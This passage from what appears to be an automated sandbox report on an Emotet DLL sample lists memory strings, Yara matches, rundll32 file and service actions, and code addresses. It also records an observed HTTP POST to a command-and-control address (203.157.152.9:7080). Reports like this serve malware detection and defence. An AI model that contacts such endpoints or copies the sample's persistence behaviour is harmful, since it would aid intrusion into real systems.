M","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: svchost.exe, 0000000E.00000003.759319799.000001D9CB19C000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
                    Source: unknownHTTP traffic detected: POST /2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/ HTTP/1.1DNT: 0Referer: 203.157.152.9/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/Content-Type: multipart/form-data; boundary=---------FFexYarq3User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 203.157.152.9:7080Content-Length: 6212Connection: Keep-AliveCache-Control: no-cache
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: svchost.exe, 0000000E.00000002.780274733.000001D9CB13C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 0000000E.00000003.766254523.000001D9CB163000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766055144.000001D9CB16C000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                    Source: svchost.exe, 0000000E.00000003.758023398.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 0000000E.00000003.766031353.000001D9CB130000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.766166337.000001D9CB185000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: zGeK5so94c.dll, type: SAMPLE
                    Source: Yara matchFile source: 00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 6.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.729e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.rundll32.exe.729e0000.1.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F545CE0 GetModuleFileNameW,PathFindFileNameW,OpenSCManagerW,OpenServiceW,DeleteService,CloseHandle,RegCreateKeyExW,RegDeleteValueW,CloseHandle,MoveFileW,ExitProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hbjpd\Jump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Hbjpd\usib.lxs:Zone.IdentifierJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FA0F1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E6417
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F4A9E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F1090
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EDE81
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729ECAA3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729ED2DD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FC6D9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA2D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA6C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EECFE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729ED6F0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FD4E1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E5418
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EE612
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E240F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E2208
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E1806
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F2C05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F4C37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F8A33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F2631
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FD02D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F8C2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F0223
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA821
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F5250
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E4844
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EE044
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E327F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FAA7B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EBE74
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F0672
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EBB96
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FC192
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E4D90
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F3590
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F0B8A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F1F88
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F7187
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F9DBF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F7BBE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EF9BA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EFFBA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F09B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F47B5
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E3FAF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EADAF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F93AA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F2FA1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E2DDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E57D4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FDBC4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E7FFE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F1DFE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E35FC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FBBF1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E67EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FCBE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F6BE4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EF5E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FD70B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E9106
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E5F04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F4F04
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E3938
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E7B39
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E3336
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FCF31
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E7731
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E9D2F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EA525
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F3F4F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F434E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729F9B4A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EC145
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E7378
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729E3B74
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EF369
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FA966
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729EC364
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_729FB165
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F457F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EED71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F53C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ECDD8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9C76
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E542D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E80E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F8684
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EE2BE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E4F4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E7547
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9B59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EBD6C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF96A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ED77E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F030B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E7D07
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E8F1B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E2B2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E1D2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EAB26
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E773B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F2938
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E83CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F19CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F83C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9DC4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E5FD2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F49EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F8FE8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E69FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E13FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E17FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EBFF4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EA7F1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E918D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EDB9E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EB394
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034FABAE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E2FA7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E43BC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF3B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ECBB1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F0E49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E6248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EA05D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F4C55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F346E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F066A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EEA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E5A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E3C7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F9A7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034FB07B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F300F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E7E0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034ED405
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E3A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F961A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F2422
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F0820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EC232
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EFEC2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E64D8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F38D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034EF6E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F3689
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E7A87
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E4685
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F7083
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F229F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F2C97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E2290
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034E40AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034F12A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_034FA6B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F541CE0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F5497DF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F549D50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54946D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F556B72
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F557329
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F5493C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F549A89
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F546987
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F54A00B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04489C76
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447542D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044780E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447E2BE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04489B59
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447ED71
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448457F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447D77E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04477D07
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04472B2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044853C0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044783CE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447CDD8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04480E49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04476248
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447A05D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04484C55
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448066A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448346E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04475A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447EA68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448B07B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04489A7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04473C7E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447D405
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448300F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04473A00
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04477E0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448961A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04480820
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04482422
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447C232
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447FEC2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044838D2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044764D8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447F6E3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04477A87
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04483689
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04474685
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04487083
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04488684
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448229F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04472290
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04482C97
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044812A3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044740AB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448A6B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04477547
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04474F4C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447BD6C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447F96A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448030B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447F100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04478F1B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447AB26
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04471D2B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04482938
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447773B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044883C9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044819CB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04489DC4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04475FD2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04488FE8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044849EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447BFF4
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447A7F1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044769FD
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044713FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044717FB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447918D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447B394
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447DB9E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04472FA7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0448ABAE
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447F3B2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0447CBB1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_044743BC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445564D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0446024E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445564C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445945C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0446405A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04454E65
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445DE6D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0445FA6F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04462873
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0446907B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04452E05
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_04450C00
